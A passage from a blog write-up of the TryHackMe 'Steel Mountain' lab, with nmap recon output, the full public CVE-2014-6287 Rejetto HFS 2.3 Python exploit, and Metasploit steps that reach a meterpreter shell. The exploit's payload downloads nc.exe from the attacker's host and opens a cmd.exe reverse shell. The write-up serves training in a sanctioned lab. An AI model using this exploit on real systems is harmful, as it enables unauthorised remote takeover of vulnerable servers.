<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Steel MountainDifficulty: Medium→HighScore: 6&#x2F;10 (Metasploit) 7.5&#x2F;10 (Without Metasploit)">
<meta property="og:type" content="article">
<meta property="og:title" content="THM Steel Mountain">
<meta property="og:url" content="http://kelpie.top/post/Virtual%20Attack%20[3].html">
<meta property="og:site_name" content="Kelpie Blog">
<meta property="og:description" content="Steel MountainDifficulty: Medium→HighScore: 6&#x2F;10 (Metasploit) 7.5&#x2F;10 (Without Metasploit)">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FruSElQYMG4PsbJYryO7zzKqalhz.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FtHy-0G6pRWRZKOt2Si4cIZU7KBy.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FvJoQiGktnwuYCqjDL_sW-RhKZPu.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fj3Gv1mhNWDFGAULW7gAXUpnOver.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Frhp5hR5RRweixwal37Nq5CahhCd.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fr1Jh-nFXj102M9dwv5ljGzwUMXc.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrN_WJn1z537huBP-dcAt4rW93MK.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FnhrqX4jsD2PphJn4fyMXryLM3QU.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fm5ogWBuMVMm5_LQijLt8XcA0gWS.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FgdCUVrCdJZ3o5hlUp0ZuqyWvQxy.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fjh2ps5b6NxsOH8IqatR01OYlmdN.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Ft08KTRhMhoym5e1K1x0JaqPdqA5.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FlsOrtyzGkxiullwS4qtPxQzrKvf.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fj3YHuYniVmeE3lD2WOxwJ4SXm7E.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FinI9DrIFXD3sKeHw-BlOtKhEqfw.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FvdVaIXUHfGEeACAuIRuIfyBBs6l.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FhL_bnhfb4wpseTBGnH_o0We1cgk.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fup38k2lVu4IF4WCoaNHvVBafFKn.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fky2sZTJExpfXAZZiTSkT6Ywak0O.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FgTXtBi7wodCteqSqXWQjWJoUvzq.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FoESFFA-W41fhuAwh4McGMgjD7y0.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqmYf-f-FNPxJlX9pYrOPXoEKLSk.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqUl_2Ntcjb_5L1KO3RG14TeriEy.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FpJFf7HQcWcbq0Q_eCgkzV3hk3UJ.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FufpRluDGVS5sGMITv9drYhq-ugs.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FjZGpNXyOIczdCGjvCJJFYRk8RdS.png">
<meta property="article:published_time" content="2022-01-20T14:28:00.000Z">
<meta property="article:modified_time" content="2024-04-10T09:43:13.278Z">
<meta property="article:author" content="l3vi4th4n">
<meta property="article:tag" content="Penetration Test">
<meta property="article:tag" content="Try Hack Me">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FruSElQYMG4PsbJYryO7zzKqalhz.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>THM Steel Mountain</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/k3lpi3b4nsh33">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/post/Virtual%20Attack%20%5B4%5D.html"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/post/Virtual%20Attack%20%5B2%5D.html"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://kelpie.top/post/Virtual%20Attack%20[3].html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&text=THM Steel Mountain"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&is_video=false&description=THM Steel Mountain"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=THM Steel Mountain&body=Check out this article: http://kelpie.top/post/Virtual%20Attack%20[3].html"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&name=THM Steel Mountain&description=&lt;h1 id=&#34;Steel-Mountain&#34;&gt;&lt;a href=&#34;#Steel-Mountain&#34; class=&#34;headerlink&#34; title=&#34;Steel Mountain&#34;&gt;&lt;/a&gt;Steel Mountain&lt;/h1&gt;&lt;p&gt;Difficulty: Medium→High&lt;br&gt;Score: 6&amp;#x2F;10 (Metasploit) 7.5&amp;#x2F;10 (Without Metasploit)&lt;/p&gt;
&lt;hr&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://kelpie.top/post/Virtual%20Attack%20[3].html&t=THM Steel Mountain"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Steel-Mountain"><span class="toc-number">1.</span> <span class="toc-text">Steel Mountain</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Target"><span class="toc-number">2.</span> <span class="toc-text">Target</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Process"><span class="toc-number">3.</span> <span class="toc-text">Process</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reconnasissance"><span class="toc-number">3.1.</span> <span class="toc-text">Reconnasissance</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Port-Service-Scan"><span class="toc-number">3.1.1.</span> <span class="toc-text">Port Service Scan</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Go-to-http-10-10-231-27-8080"><span class="toc-number">3.1.2.</span> <span class="toc-text">Go to http:&#x2F;&#x2F;10.10.231.27:8080</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Metasploit"><span class="toc-number">3.2.</span> <span class="toc-text">Metasploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit-search-exploit"><span class="toc-number">3.2.1.</span> <span class="toc-text">Metasploit search exploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploiting"><span class="toc-number">3.2.2.</span> <span class="toc-text">Exploiting</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Find-the-first-flag"><span class="toc-number">3.2.3.</span> <span class="toc-text">Find the first flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">3.2.4.</span> <span class="toc-text">Privilege Escalation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Without-Metasploit"><span class="toc-number">3.3.</span> <span class="toc-text">Without Metasploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Use-CVE-2014-6287-to-exploit"><span class="toc-number">3.3.1.</span> <span class="toc-text">Use CVE-2014-6287 to exploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Use-binary-file-winPEAS-exe-to-enumeration-the-systeminfo"><span class="toc-number">3.3.2.</span> <span class="toc-text">Use binary file winPEAS.exe to enumeration the systeminfo</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Delivery"><span class="toc-number">3.3.3.</span> <span class="toc-text">Delivery</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Netcat-bind-shell"><span class="toc-number">3.3.3.1.</span> <span class="toc-text">Netcat bind shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Netcat-reverse-shell"><span class="toc-number">3.3.3.2.</span> <span class="toc-text">Netcat reverse shell</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Summary"><span class="toc-number">4.</span> <span class="toc-text">Summary</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        THM Steel Mountain
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">l3vi4th4n</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-20T14:28:00.000Z" class="dt-published" itemprop="datePublished">2022-01-20</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Penetration-Test/">Penetration Test</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Penetration-Test/" rel="tag">Penetration Test</a>, <a class="p-category" href="/tags/Try-Hack-Me/" rel="tag">Try Hack Me</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Steel-Mountain"><a href="#Steel-Mountain" class="headerlink" title="Steel Mountain"></a>Steel Mountain</h1><p>Difficulty: Medium→High<br>Score: 6&#x2F;10 (Metasploit) 7.5&#x2F;10 (Without Metasploit)</p>
<hr>
<span id="more"></span>

<h1 id="Target"><a href="#Target" class="headerlink" title="Target"></a>Target</h1><ol>
<li>2 flags</li>
<li>system privilege</li>
</ol>
<h1 id="Process"><a href="#Process" class="headerlink" title="Process"></a>Process</h1><h2 id="Reconnasissance"><a href="#Reconnasissance" class="headerlink" title="Reconnasissance"></a>Reconnasissance</h2><h3 id="Port-Service-Scan"><a href="#Port-Service-Scan" class="headerlink" title="Port Service Scan"></a>Port Service Scan</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">nmap -p1-10000 <span class="token number">10.10</span>.60.210<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>We can find the port 80,135,139,445,3389,5985,8080 is opened.<br>Let’s inspect what version of services.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">nmap -p80,135,139,445,3389,5985,8080 <span class="token parameter variable">-A</span>  <span class="token number">10.10</span>.60.210<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-latex" data-language="latex"><code class="language-latex">Output:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 09:03 EST
Nmap scan report for 10.10.60.210
Host is up (0.23s latency).
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2022-01-22T14:05:55+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2022-01-21T13:58:05
|_Not valid after:  2022-07-23T13:58:05
| rdp-ntlm-info:
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2022-01-22T14:05:49+00:00
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96<span class="token comment">%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)</span>
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-01-22T14:05:49
|_  start_date: 2022-01-22T13:57:59
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: &lt;unknown>, NetBIOS MAC: 02:0c:ff:1b:e3:f5 (unknown)
TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   225.02 ms 10.11.0.1
2   225.16 ms 10.10.60.210
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.68 seconds<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="Go-to-http-10-10-231-27-8080"><a href="#Go-to-http-10-10-231-27-8080" class="headerlink" title="Go to http://10.10.231.27:8080"></a>Go to <a target="_blank" rel="noopener" href="http://10.10.231.27:8080/">http://10.10.231.27:8080</a></h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FruSElQYMG4PsbJYryO7zzKqalhz.png"><br>Inspect the elements, we found the point!<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FtHy-0G6pRWRZKOt2Si4cIZU7KBy.png"><br>rejetto HTTP FILE SERVER<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FvJoQiGktnwuYCqjDL_sW-RhKZPu.png"><br>Google rejetto 2.3 exploit<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fj3Gv1mhNWDFGAULW7gAXUpnOver.png"><br>The script original code [** We will use it again when in without metasploit situation** ]</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python</span>
<span class="token comment"># Exploit Title: HttpFileServer 2.3.x Remote Command Execution</span>
<span class="token comment"># Google Dork: intext:"httpfileserver 2.3"</span>
<span class="token comment"># Date: 04-01-2016</span>
<span class="token comment"># Remote: Yes</span>
<span class="token comment"># Exploit Author: Avinash Kumar Thapa aka "-Acid"</span>
<span class="token comment"># Vendor Homepage: http://rejetto.com/</span>
<span class="token comment"># Software Link: http://sourceforge.net/projects/hfs/</span>
<span class="token comment"># Version: 2.3.x</span>
<span class="token comment"># Tested on: Windows Server 2008 , Windows 8, Windows 7</span>
<span class="token comment"># CVE : CVE-2014-6287</span>
<span class="token comment"># Description: You can use HFS (HTTP File Server) to send and receive files.</span>
<span class="token comment">#         It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.</span>
<span class="token comment">#         It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.</span>

<span class="token comment">#Usage : python Exploit.py &lt;Target IP address> &lt;Target Port Number></span>
<span class="token comment">#EDB Note: You need to be using a web server hosting netcat (http://&lt;attackers_ip>:80/nc.exe).</span>
<span class="token comment">#          You may need to run it multiple times for success!</span>
<span class="token keyword">import</span> urllib2
<span class="token keyword">import</span> sys
<span class="token keyword">try</span><span class="token punctuation">:</span>
  <span class="token keyword">def</span> <span class="token function">script_create</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    urllib2<span class="token punctuation">.</span>urlopen<span class="token punctuation">(</span><span class="token string">"http://"</span><span class="token operator">+</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">":"</span><span class="token operator">+</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">"/?search=%00&#123;.+"</span><span class="token operator">+</span>save<span class="token operator">+</span><span class="token string">".&#125;"</span><span class="token punctuation">)</span>
  <span class="token keyword">def</span> <span class="token function">execute_script</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    urllib2<span class="token punctuation">.</span>urlopen<span class="token punctuation">(</span><span class="token string">"http://"</span><span class="token operator">+</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">":"</span><span class="token operator">+</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">"/?search=%00&#123;.+"</span><span class="token operator">+</span>exe<span class="token operator">+</span><span class="token string">".&#125;"</span><span class="token punctuation">)</span>
  <span class="token keyword">def</span> <span class="token function">nc_run</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    urllib2<span class="token punctuation">.</span>urlopen<span class="token punctuation">(</span><span class="token string">"http://"</span><span class="token operator">+</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">":"</span><span class="token operator">+</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">"/?search=%00&#123;.+"</span><span class="token operator">+</span>exe1<span class="token operator">+</span><span class="token string">".&#125;"</span><span class="token punctuation">)</span>
  ip_addr <span class="token operator">=</span> <span class="token string">"192.168.44.128"</span> <span class="token comment">#local IP address</span>
  local_port <span class="token operator">=</span> <span class="token string">"443"</span> <span class="token comment"># Local Port number</span>
  vbs <span class="token operator">=</span> <span class="token string">"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"</span><span class="token operator">+</span>ip_addr<span class="token operator">+</span><span class="token string">"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"</span>
  save<span class="token operator">=</span> <span class="token string">"save|"</span> <span class="token operator">+</span> vbs
  vbs2 <span class="token operator">=</span> <span class="token string">"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"</span>
  exe<span class="token operator">=</span> <span class="token string">"exec|"</span><span class="token operator">+</span>vbs2
  vbs3 <span class="token operator">=</span> <span class="token string">"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"</span><span class="token operator">+</span>ip_addr<span class="token operator">+</span><span class="token string">"%20"</span><span class="token operator">+</span>local_port
  exe1<span class="token operator">=</span> <span class="token string">"exec|"</span><span class="token operator">+</span>vbs3
  script_create<span class="token punctuation">(</span><span class="token punctuation">)</span>
  execute_script<span class="token punctuation">(</span><span class="token punctuation">)</span>
  nc_run<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">except</span><span class="token punctuation">:</span>
  <span class="token keyword">print</span> <span class="token triple-quoted-string string">"""[.]Something went wrong..!
  Usage is :[.] python exploit.py &lt;Target IP address>  &lt;Target Port Number>
  Don't forgot to change the Local IP address and Port number on the script"""</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F&quot;+ip_addr+&quot;%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with
url-decode
C:\Users\Public\script.vbs|dim xHttp: Set xHttp &#x3D; createobject(&quot;Microsoft.XMLHTTP&quot;)
dim bStrm: Set bStrm &#x3D; createobject(&quot;Adodb.Stream&quot;)
xHttp.Open &quot;GET&quot;, &quot;http:&#x2F;&#x2F;&quot; ip_addr &quot;&#x2F;nc.exe&quot;, False
&#x2F;&#x2F; We can open the server to let victim download nc.exe
xHttp.Send
with bStrm
    .type &#x3D; 1 &#39;&#x2F;&#x2F;binary
    .open
    .write xHttp.responseBody
    .savetofile &quot;C:\Users\Public\nc.exe&quot;, 2 &#39;&#x2F;&#x2F;overwrite save file
end with<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h2><h3 id="Metasploit-search-exploit"><a href="#Metasploit-search-exploit" class="headerlink" title="Metasploit search exploit"></a>Metasploit search exploit</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">search rejetto <span class="token number">2.3</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Frhp5hR5RRweixwal37Nq5CahhCd.png"><br>OK, let’s use metasploit exploit victim machine first<br>Use the module, show its options<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fr1Jh-nFXj102M9dwv5ljGzwUMXc.png"><br>Change the RHOST SRVHOST LHOST LPORT(Default 4444) value.<br>RHOST is victim machine IP, RPORT is 8080<br>SRVHOST and LHOST are LocalMachine IP</p>
<h3 id="Exploiting"><a href="#Exploiting" class="headerlink" title="Exploiting"></a>Exploiting</h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrN_WJn1z537huBP-dcAt4rW93MK.png"><br>OK already got metepreter shell<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FnhrqX4jsD2PphJn4fyMXryLM3QU.png"></p>
